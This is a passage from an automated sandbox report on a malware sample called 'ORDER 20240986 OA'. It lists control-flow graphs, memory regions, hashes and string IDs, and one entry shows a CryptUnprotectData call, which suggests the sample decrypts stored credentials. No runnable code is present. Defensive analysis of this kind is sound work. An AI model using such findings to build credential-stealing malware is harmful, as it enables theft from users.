                                                                                                                                                  • API String ID: 0-1273542581
                                                                                                                                                  • Opcode ID: 093c2e4083236cb70f179a5f87b81e941396564ff494712c1f7c8430c3a63478
                                                                                                                                                  • Instruction ID: 2fe976f790ccae8a2a7d8835b60eebca302cf83a23ea2813c26577bd5af419d0
                                                                                                                                                  • Opcode Fuzzy Hash: 093c2e4083236cb70f179a5f87b81e941396564ff494712c1f7c8430c3a63478
                                                                                                                                                  • Instruction Fuzzy Hash: 5B81E674E00208DFDB14DFAAD884A9DBBF2BF88301F14D069E819AB361DB309985CF50

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 1175 15ccd8-15cd08 1176 15cd0f-15cdec call 1541a0 call 153cc0 1175->1176 1177 15cd0a 1175->1177 1187 15cdf3-15ce14 call 155658 1176->1187 1188 15cdee 1176->1188 1177->1176 1190 15ce19-15ce24 1187->1190 1188->1187 1191 15ce26 1190->1191 1192 15ce2b-15ce2f 1190->1192 1191->1192 1193 15ce34-15ce3b 1192->1193 1194 15ce31-15ce32 1192->1194 1196 15ce42-15ce50 1193->1196 1197 15ce3d 1193->1197 1195 15ce53-15ce97 1194->1195 1201 15cefd-15cf14 1195->1201 1196->1195 1197->1196 1203 15cf16-15cf3b 1201->1203 1204 15ce99-15ceaf 1201->1204 1211 15cf53 1203->1211 1212 15cf3d-15cf52 1203->1212 1208 15ceb1-15cebd 1204->1208 1209 15ced9 1204->1209 1213 15cec7-15cecd 1208->1213 1214 15cebf-15cec5 1208->1214 1210 15cedf-15cefc 1209->1210 1210->1201 1212->1211 1215 15ced7 1213->1215 1214->1215 1215->1210
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2945076810.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_150000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 0oGp$LjGp$LjGp$PHdq$PHdq
                                                                                                                                                  • API String ID: 0-1273542581
                                                                                                                                                  • Opcode ID: 2e7799c8af7dc3bfac1d3df63d53cef9e8e56f00c83b4e27ab6b2bee49e77e96
                                                                                                                                                  • Instruction ID: 38f1ef81ed6410e9c735102624a660da9948f0322744adfd072f42c8abaa5534
                                                                                                                                                  • Opcode Fuzzy Hash: 2e7799c8af7dc3bfac1d3df63d53cef9e8e56f00c83b4e27ab6b2bee49e77e96
                                                                                                                                                  • Instruction Fuzzy Hash: 9A81A274E00218DFDB14DFAAD984A9DBBF2BF88301F14D069E819AB365DB349985CF50

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 1219 15d278-15d2a8 1220 15d2af-15d38c call 1541a0 call 153cc0 1219->1220 1221 15d2aa 1219->1221 1231 15d393-15d3b4 call 155658 1220->1231 1232 15d38e 1220->1232 1221->1220 1234 15d3b9-15d3c4 1231->1234 1232->1231 1235 15d3c6 1234->1235 1236 15d3cb-15d3cf 1234->1236 1235->1236 1237 15d3d4-15d3db 1236->1237 1238 15d3d1-15d3d2 1236->1238 1240 15d3e2-15d3f0 1237->1240 1241 15d3dd 1237->1241 1239 15d3f3-15d437 1238->1239 1245 15d49d-15d4b4 1239->1245 1240->1239 1241->1240 1247 15d4b6-15d4db 1245->1247 1248 15d439-15d44f 1245->1248 1254 15d4f3 1247->1254 1255 15d4dd-15d4f2 1247->1255 1252 15d451-15d45d 1248->1252 1253 15d479 1248->1253 1256 15d467-15d46d 1252->1256 1257 15d45f-15d465 1252->1257 1258 15d47f-15d49c 1253->1258 1255->1254 1259 15d477 1256->1259 1257->1259 1258->1245 1259->1258
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2945076810.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_150000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 0oGp$LjGp$LjGp$PHdq$PHdq
                                                                                                                                                  • API String ID: 0-1273542581
                                                                                                                                                  • Opcode ID: 8cf1a8c957b226bb59d02c80b1e9ebbd065e27d330e797ffe1266146c06b588f
                                                                                                                                                  • Instruction ID: a6ac649effd4a102230d3f0c5bc9daf0ee5cbca020ada04c05cfb0c317324571
                                                                                                                                                  • Opcode Fuzzy Hash: 8cf1a8c957b226bb59d02c80b1e9ebbd065e27d330e797ffe1266146c06b588f
                                                                                                                                                  • Instruction Fuzzy Hash: 4581C774E00218DFDB14DFAAD884A9DBBF2BF88301F14D069E819AB365DB34A945CF50

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 1263 15c472-15c498 1264 15c49f-15c57c call 1541a0 call 153cc0 1263->1264 1265 15c49a 1263->1265 1275 15c583-15c5a4 call 155658 1264->1275 1276 15c57e 1264->1276 1265->1264 1278 15c5a9-15c5b4 1275->1278 1276->1275 1279 15c5b6 1278->1279 1280 15c5bb-15c5bf 1278->1280 1279->1280 1281 15c5c4-15c5cb 1280->1281 1282 15c5c1-15c5c2 1280->1282 1284 15c5d2-15c5e0 1281->1284 1285 15c5cd 1281->1285 1283 15c5e3-15c627 1282->1283 1289 15c68d-15c6a4 1283->1289 1284->1283 1285->1284 1291 15c6a6-15c6cb 1289->1291 1292 15c629-15c63f 1289->1292 1298 15c6e3 1291->1298 1299 15c6cd-15c6e2 1291->1299 1296 15c641-15c64d 1292->1296 1297 15c669 1292->1297 1300 15c657-15c65d 1296->1300 1301 15c64f-15c655 1296->1301 1302 15c66f-15c68c 1297->1302 1299->1298 1303 15c667 1300->1303 1301->1303 1302->1289 1303->1302
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2945076810.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_150000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 0oGp$LjGp$LjGp$PHdq$PHdq
                                                                                                                                                  • API String ID: 0-1273542581
                                                                                                                                                  • Opcode ID: e6b437a83850f3886571aedb5aef19f3df68d2136fc9c92fd409969851afa0df
                                                                                                                                                  • Instruction ID: afe450eb60e08758e5495e322af8b02a417509e4e4fe6dbf666ce69a73af67f1
                                                                                                                                                  • Opcode Fuzzy Hash: e6b437a83850f3886571aedb5aef19f3df68d2136fc9c92fd409969851afa0df
                                                                                                                                                  • Instruction Fuzzy Hash: 7281C574E00218DFDB14DFAAC984A9DBBF2BF88301F14D169E819AB365DB349985CF50
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2945076810.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_150000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: (odq$4'dq$4'dq$4'dq
                                                                                                                                                  • API String ID: 0-3599379907
                                                                                                                                                  • Opcode ID: bd17f507a2551766b8c760d890c943ce8320ca99f113869695a612837d7c64df
                                                                                                                                                  • Instruction ID: cb9e0860502a4e5621f8a6f59758a130d87527f770f01c9195d36ad7f0277444
                                                                                                                                                  • Opcode Fuzzy Hash: bd17f507a2551766b8c760d890c943ce8320ca99f113869695a612837d7c64df
                                                                                                                                                  • Instruction Fuzzy Hash: 3AA28170A40209DFCB15CFA8C994AAEBBF2BF88301F558659E815DF261D730ED85CB52

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 1640 156fc8-156ffe 1641 157006-15700c 1640->1641 1776 157000 call 1569a0 1640->1776 1777 157000 call 156fc8 1640->1777 1778 157000 call 157118 1640->1778 1642 15705c-157060 1641->1642 1643 15700e-157012 1641->1643 1646 157077-15708b 1642->1646 1647 157062-157071 1642->1647 1644 157014-157019 1643->1644 1645 157021-157028 1643->1645 1644->1645 1648 1570fe-15713b 1645->1648 1649 15702e-157035 1645->1649 1652 157093-15709a 1646->1652 1773 15708d call 159dd0 1646->1773 1774 15708d call 159de0 1646->1774 1775 15708d call 15a0e8 1646->1775 1650 157073-157075 1647->1650 1651 15709d-1570a7 1647->1651 1661 157146-157166 1648->1661 1662 15713d-157143 1648->1662 1649->1642 1653 157037-15703b 1649->1653 1650->1652 1654 1570b1-1570b5 1651->1654 1655 1570a9-1570af 1651->1655 1658 15703d-157042 1653->1658 1659 15704a-157051 1653->1659 1656 1570b7 1654->1656 1657 1570bd-1570f7 1654->1657 1655->1657 1656->1657 1657->1648 1658->1659 1659->1648 1663 157057-15705a 1659->1663 1668 15716d-157174 1661->1668 1669 157168 1661->1669 1662->1661 1663->1652 1672 157176-157181 1668->1672 1671 1574fc-157505 1669->1671 1673 157187-15719a 1672->1673 1674 15750d-157519 1672->1674 1679 1571b0-1571cb 1673->1679 1680 15719c-1571aa 1673->1680 1681 157530-15753a 1674->1681 1682 15751b-157521 1674->1682 1687 1571cd-1571d3 1679->1687 1688 1571ef-1571f2 1679->1688 1680->1679 1690 157484-15748b 1680->1690 1683 157523-15752f 1682->1683 1684 157538-157549 1682->1684 1683->1681 1696 157552-157556 1684->1696 1697 15754b-157550 1684->1697 1691 1571d5 1687->1691 1692 1571dc-1571df 1687->1692 1694 15734c-157352 1688->1694 1695 1571f8-1571fb 1688->1695 1690->1671 1693 15748d-15748f 1690->1693 1691->1692 1691->1694 1698 157212-157218 1691->1698 1699 15743e-157441 1691->1699 1692->1698 1700 1571e1-1571e4 1692->1700 1701 157491-157496 1693->1701 1702 15749e-1574a4 1693->1702 1694->1699 1703 157358-15735d 1694->1703 1695->1694 1704 157201-157207 1695->1704 1705 15755c-15755d 1696->1705 1697->1705 1710 15721e-157220 1698->1710 1711 15721a-15721c 1698->1711 1712 157447-15744d 1699->1712 1713 157508 1699->1713 1706 15727e-157284 1700->1706 1707 1571ea 1700->1707 1701->1702 1702->1674 1708 1574a6-1574ab 1702->1708 1703->1699 1704->1694 1709 15720d 1704->1709 1706->1699 1716 15728a-157290 1706->1716 1707->1699 1714 1574f0-1574f3 1708->1714 1715 1574ad-1574b2 1708->1715 1709->1699 1717 15722a-157233 1710->1717 1711->1717 1718 157472-157476 1712->1718 1719 15744f-157457 1712->1719 1713->1674 1714->1713 1723 1574f5-1574fa 1714->1723 1715->1713 1724 1574b4 1715->1724 1725 157296-157298 1716->1725 1726 157292-157294 1716->1726 1720 157235-157240 1717->1720 1721 157246-15724b 1717->1721 1718->1690 1722 157478-15747e 1718->1722 1719->1674 1727 15745d-15746c 1719->1727 1720->1699 1720->1721 1732 157251-15726e 1721->1732 1722->1672 1722->1690 1723->1671 1723->1693 1728 1574bb-1574c0 1724->1728 1729 1572a2-1572b9 1725->1729 1726->1729 1727->1679 1727->1718 1733 1574e2-1574e4 1728->1733 1734 1574c2-1574c4 1728->1734 1740 1572e4-15730b 1729->1740 1741 1572bb-1572d4 1729->1741 1747 157274-157279 1732->1747 1748 157362-157398 1732->1748 1733->1713 1736 1574e6-1574e9 1733->1736 1737 1574c6-1574cb 1734->1737 1738 1574d3-1574d9 1734->1738 1736->1714 1737->1738 1738->1674 1739 1574db-1574e0 1738->1739 1739->1733 1743 1574b6-1574b9 1739->1743 1740->1713 1753 157311-157314 1740->1753 1741->1748 1751 1572da-1572df 1741->1751 1743->1713 1743->1728 1747->1748 1754 1573a5-1573ad 1748->1754 1755 15739a-15739e 1748->1755 1751->1748 1753->1713 1756 15731a-157343 1753->1756 1754->1713 1759 1573b3-1573b8 1754->1759 1757 1573a0-1573a3 1755->1757 1758 1573bd-1573c1 1755->1758 1756->1748 1771 157345-15734a 1756->1771 1757->1754 1757->1758 1761 1573e0-1573e4 1758->1761 1762 1573c3-1573c9 1758->1762 1759->1699 1764 1573e6-1573ec 1761->1764 1765 1573ee-15740d call 1576f1 1761->1765 1762->1761 1763 1573cb-1573d3 1762->1763 1763->1713 1767 1573d9-1573de 1763->1767 1764->1765 1768 157413-157417 1764->1768 1765->1768 1767->1699 1768->1699 1769 157419-157435 1768->1769 1769->1699 1771->1748 1773->1652 1774->1652 1775->1652 1776->1641 1777->1641 1778->1641
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2945076810.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_150000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: (odq$(odq$,hq$,hq
                                                                                                                                                  • API String ID: 0-1125629291
                                                                                                                                                  • Opcode ID: c5f18dba906fdd06bf1efea0d0f0989aa19d9545dcfd2c7512291053c769a8fd
                                                                                                                                                  • Instruction ID: fec156e518712d83adef23a3bf6082ffa4208e19327c49ee5d74acf7bb2d7f1f
                                                                                                                                                  • Opcode Fuzzy Hash: c5f18dba906fdd06bf1efea0d0f0989aa19d9545dcfd2c7512291053c769a8fd
                                                                                                                                                  • Instruction Fuzzy Hash: C6026170A04219DFCB15CFA8E895AADBBF2BF49301F158059EC25AB2A1D730DD89CB50
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2950756812.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_7660000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: Tedq$Tedq
                                                                                                                                                  • API String ID: 0-4137347946
                                                                                                                                                  • Opcode ID: 8042de38499585ae8938eff11f2ce412e52dc511c1d1aca3b6c8595f2a4efdd0
                                                                                                                                                  • Instruction ID: ee8f2d7ee7fdf10112b360066662414d7e0ba3200fa3ba40fe45db4aef494626
                                                                                                                                                  • Opcode Fuzzy Hash: 8042de38499585ae8938eff11f2ce412e52dc511c1d1aca3b6c8595f2a4efdd0
                                                                                                                                                  • Instruction Fuzzy Hash: 8CC2D474A01229DFDB64DF64C898BE9BBB2FB89300F1041E9D909A7361DB359E85DF40
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2945076810.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_150000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: (odq$Hhq
                                                                                                                                                  • API String ID: 0-1720555311
                                                                                                                                                  • Opcode ID: af3d45df7bf60611fb10b54e9a926aa4015b4c35646280b57f436102b1afc8a8
                                                                                                                                                  • Instruction ID: 53b44350fe55de82ffe86d35b2969204e6b0a7bdf326d69d06d0ba14904895ed
                                                                                                                                                  • Opcode Fuzzy Hash: af3d45df7bf60611fb10b54e9a926aa4015b4c35646280b57f436102b1afc8a8
                                                                                                                                                  • Instruction Fuzzy Hash: 34127070B00219CFDB14DFA9C854BAEBBF6BF88301F508569E9599B391DB309D45CB90
                                                                                                                                                  APIs
                                                                                                                                                  • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 3AE88F5D
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2974263861.000000003AE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 3AE80000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_3ae80000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CryptDataUnprotect
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 834300711-0
                                                                                                                                                  • Opcode ID: 44afd4f02eda0ed1a46c9fde9a06d4542a3e872ecff9d8f51d097da0e94a268b
                                                                                                                                                  • Instruction ID: 7500015d439be959306fbf8875e3c064fba93d252f6722f2afd3ea75fe81fe45
                                                                                                                                                  • Opcode Fuzzy Hash: 44afd4f02eda0ed1a46c9fde9a06d4542a3e872ecff9d8f51d097da0e94a268b
                                                                                                                                                  • Instruction Fuzzy Hash: 521159B2800249EFDB10CF99C841BDEBFF5EF48320F14845AE918A7210C779A950DFA5
                                                                                                                                                  APIs
                                                                                                                                                  • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 3AE88F5D
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2974263861.000000003AE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 3AE80000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_3ae80000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CryptDataUnprotect
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 834300711-0
                                                                                                                                                  • Opcode ID: 6f78e5a1ab06c9b99352c94e06ea477817c5fc759883e52ab92ae1b2c47791f3
                                                                                                                                                  • Instruction ID: e2fd9d07db38e41506c8484073dc15214c85f25d260a7bdb8e428f5782148e58
                                                                                                                                                  • Opcode Fuzzy Hash: 6f78e5a1ab06c9b99352c94e06ea477817c5fc759883e52ab92ae1b2c47791f3
                                                                                                                                                  • Instruction Fuzzy Hash: 4D1179B6800249DFDB10CF99C940BEEBFF5EF48320F24841AE958A7210C379A650DFA1
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2950756812.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_7660000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: c
                                                                                                                                                  • API String ID: 0-112844655
                                                                                                                                                  • Opcode ID: d61c3e7422386c890c425a85fb9c101abdeb65a644b02a6023dc0aeb32bbecdf
                                                                                                                                                  • Instruction ID: 469fb6db2ed2ee9a6a4cec5ec8bf7c324b7712196eefb5b81b24f75700424774
                                                                                                                                                  • Opcode Fuzzy Hash: d61c3e7422386c890c425a85fb9c101abdeb65a644b02a6023dc0aeb32bbecdf
                                                                                                                                                  • Instruction Fuzzy Hash: D44159B1E016598BEB68CF6BC9547DAFAF3AFC9300F14C1AAC40DA6254DB740A858F51
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2950680601.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_7610000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 4de2fff19b650570135ae0c4acb9050559d63727df58e8ad5e5712431c8884a6
                                                                                                                                                  • Instruction ID: b680ba131447e421b3c3084c559163c877995c8582fbfb8c9aff73ee914a1650
                                                                                                                                                  • Opcode Fuzzy Hash: 4de2fff19b650570135ae0c4acb9050559d63727df58e8ad5e5712431c8884a6
                                                                                                                                                  • Instruction Fuzzy Hash: EB826E74E012299FDB64DF69C998BDDBBB2BB89300F1481E9980DA7261DB315EC5CF40
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2950680601.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_7610000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: cffdcff853dcbaf08953762c95b5314799afc4c6c90cc48f0302c0e97eb40dc0
                                                                                                                                                  • Instruction ID: 99e0f55c948863a84acdbed3a1d0286833d8cc291ca7da8ee98b8cfec8629cc9
                                                                                                                                                  • Opcode Fuzzy Hash: cffdcff853dcbaf08953762c95b5314799afc4c6c90cc48f0302c0e97eb40dc0
                                                                                                                                                  • Instruction Fuzzy Hash: D0727C74E012289FDB64DF69C994BDEBBB2BB89300F1481E9A50DA7261DB315EC1CF41
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2974233369.000000003AC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 3AC90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_3ac90000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: e4bb9ff47116419eb66ad8b805c14135fea874c5a70d041d2177552fb7ceba5e
                                                                                                                                                  • Instruction ID: ed319663e2dd83cf4f3af69a352739450ffb779676a809341ec914fdfcad82ba
                                                                                                                                                  • Opcode Fuzzy Hash: e4bb9ff47116419eb66ad8b805c14135fea874c5a70d041d2177552fb7ceba5e
                                                                                                                                                  • Instruction Fuzzy Hash: 1D222974E002188FDB54DFA9C984BDDFBB2BF88300F5485A9D409AB365DB349986CF91
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2974263861.000000003AE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 3AE80000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_3ae80000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 4efd09723c483049477f67a5a02e412b240bb50180416ed76c4d64ce4e19904e
                                                                                                                                                  • Instruction ID: f7c6d1402ff1fb03be6b22d8e7a2c7b789806230bc168622d93990219123630f
                                                                                                                                                  • Opcode Fuzzy Hash: 4efd09723c483049477f67a5a02e412b240bb50180416ed76c4d64ce4e19904e
                                                                                                                                                  • Instruction Fuzzy Hash: 78E1A2B4E01218CFEB64CFA5C994B9DBBB2BF89304F1081A9D808B7395DB755A85CF50
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2950484955.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_7560000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: b1c7ba888b28d28b206ad08a9b33ab67f1b999c1b0220863c0b5c001e797f622
                                                                                                                                                  • Instruction ID: a9369b61fa674e90880f7bb9a584d29b51271a36df42e3d27197c31428ac1a0e
                                                                                                                                                  • Opcode Fuzzy Hash: b1c7ba888b28d28b206ad08a9b33ab67f1b999c1b0220863c0b5c001e797f622
                                                                                                                                                  • Instruction Fuzzy Hash: 88D19C74E00218CFDB14DFA5C994B9DBBB2BB89300F1081A9D809AB355DB359E86CF50
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2950484955.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_7560000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 0e16e606227b8b5ba0fb1380750cc9e77962067ef28a93c67a41507c2032a953
                                                                                                                                                  • Instruction ID: cac0de8260c1429c9e149d6547be781968656dcbd0b104c3eb4eae23e6a7ab30
                                                                                                                                                  • Opcode Fuzzy Hash: 0e16e606227b8b5ba0fb1380750cc9e77962067ef28a93c67a41507c2032a953
                                                                                                                                                  • Instruction Fuzzy Hash: 37D19EB4E01218CFDB54DFA5C994BDDBBB2BB89300F1081A9D409AB355DB35AE85CF50
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2950699365.0000000007620000.00000040.00000800.00020000.00000000.sdmp, Offset: 07620000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_7620000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 2f745fd287ed444c5f0ed27c81c2dbd635e21ea80293ee6b1a57f3c5ba179483
                                                                                                                                                  • Instruction ID: 3e4ebe3c869e3bb28670ff84ad3f72cfb2d0b8b40511f5ea40b98126dd13ae82
                                                                                                                                                  • Opcode Fuzzy Hash: 2f745fd287ed444c5f0ed27c81c2dbd635e21ea80293ee6b1a57f3c5ba179483
                                                                                                                                                  • Instruction Fuzzy Hash: 4CD1AE74E00228CFDB54DFA5C994B9DBBB2BF89300F1081A9D909AB355DB349E86DF50
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2974263861.000000003AE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 3AE80000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_3ae80000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: d9bc4a2ef8e9ac52128d23200770302386d6ba404765f12fe8898510f68f326c
                                                                                                                                                  • Instruction ID: 7752e99365562f4b47942e6234816507080f4c3302e98a59ec7784e456b6b3e6
                                                                                                                                                  • Opcode Fuzzy Hash: d9bc4a2ef8e9ac52128d23200770302386d6ba404765f12fe8898510f68f326c
                                                                                                                                                  • Instruction Fuzzy Hash: 3BD19E78E00218CFDB54DFA9C994B9DBBB2BF89300F5080A9D908AB355DB759D86CF50
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2974233369.000000003AC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 3AC90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_3ac90000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 15bc0b3cce2b69602ddc4776b29099eb7fe5f6611b14145fd241082b5e361414
                                                                                                                                                  • Instruction ID: 2ac29f4f9caa0345b11ccda82ccf1d716d424e779ff2d25be18a0325ee9eae34
                                                                                                                                                  • Opcode Fuzzy Hash: 15bc0b3cce2b69602ddc4776b29099eb7fe5f6611b14145fd241082b5e361414
                                                                                                                                                  • Instruction Fuzzy Hash: 6FC1AF74E01218CFDB14DFA5C994BDDBBB2AF89300F1081A9D809AB365DB359E86CF50
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2974233369.000000003AC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 3AC90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_3ac90000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 766d94b275f6704388ca6055413e92cd397abdaa650172d11887afdd883cb3f2
                                                                                                                                                  • Instruction ID: 29d18e975480f91c179952c9ac1c8b254f6af850a9796ab01ce16ebc635706a0
                                                                                                                                                  • Opcode Fuzzy Hash: 766d94b275f6704388ca6055413e92cd397abdaa650172d11887afdd883cb3f2
                                                                                                                                                  • Instruction Fuzzy Hash: C3C1B174E00218CFDB54DFA5C994BDDBBB2BF88300F1081A9D809AB365DB359A86CF50
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2974263861.000000003AE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 3AE80000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_3ae80000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
